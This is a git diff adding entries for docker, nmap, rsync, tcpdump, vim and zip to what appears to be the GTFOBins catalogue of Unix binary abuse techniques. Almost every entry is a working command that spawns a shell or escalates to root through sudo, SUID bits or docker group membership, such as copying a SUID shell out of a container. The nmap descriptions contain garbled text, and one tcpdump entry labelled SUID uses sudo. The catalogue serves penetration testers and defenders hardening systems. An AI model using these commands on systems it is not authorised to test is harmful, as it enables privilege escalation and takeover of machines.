diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
new file mode 100644
index 0000000..c27e24c
--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,19 @@
+---
+description: |
+ Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
+
+ This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
+functions:
+ execute-interactive:
+ - code: |
+ docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+ sudo-enabled:
+ - code: |
+ sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+ suid-enabled:
+ - code: |
+ ./docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+---
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
new file mode 100644
index 0000000..cc93942
--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,18 @@
+---
+functions:
+ execute-non-interactive:
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh")' > /tmp/script.nse
+ nmap --script=/tmp/script.nse
+ sudo-enabled:
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh")' > /tmp/script.nse
+ sudo nmap --script=/tmp/script.nse
+ suid-enabled:
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
+ ./nmap --script=/tmp/script.nse
+---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
new file mode 100644
index 0000000..754d848
--- /dev/null
+++ b/_gtfobins/rsync.md 
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-interactive:
+ - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+ sudo-enabled:
+ - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+ suid-enabled:
+ - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+---
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
new file mode 100644
index 0000000..aa3368a
--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,17 @@
+---
+functions:
+ execute-non-interactive:
+ - code: |
+ COMMAND='id > /tmp/output'
+ TF=$(mktemp -u)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+ suid-enabled:
+ - code: |
+ COMMAND='id > /tmp/output'
+ TF=$(mktemp -u)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+---
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
new file mode 100644
index 0000000..fb45d0b
--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+ execute-interactive:
+ - code: vim -c ':!/bin/sh'
+ - code: |
+ vim
+ :set shell=/bin/sh
+ :shell
+ file-write:
+ - code: |
+ vim file_to_write
+ w
+ file-read:
+ - code: vim file_to_read
+ suid-enabled:
+ - code: ./vim -c ':!/bin/sh -p'
+ sudo-enabled:
+ - code: sudo vim -c ':!/bin/sh'
+---
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
new file mode 100644
index 0000000..13f9031
--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,15 @@
+---
+functions:
+ execute-interactive:
+ - code: |
+ zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ rm /tmp/x.zip
+ sudo-enabled:
+ - code: |
+ sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ sudo rm /tmp/x.zip
+ suid-limited:
+ - code: |
+ ./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ sudo rm /tmp/x.zip
+---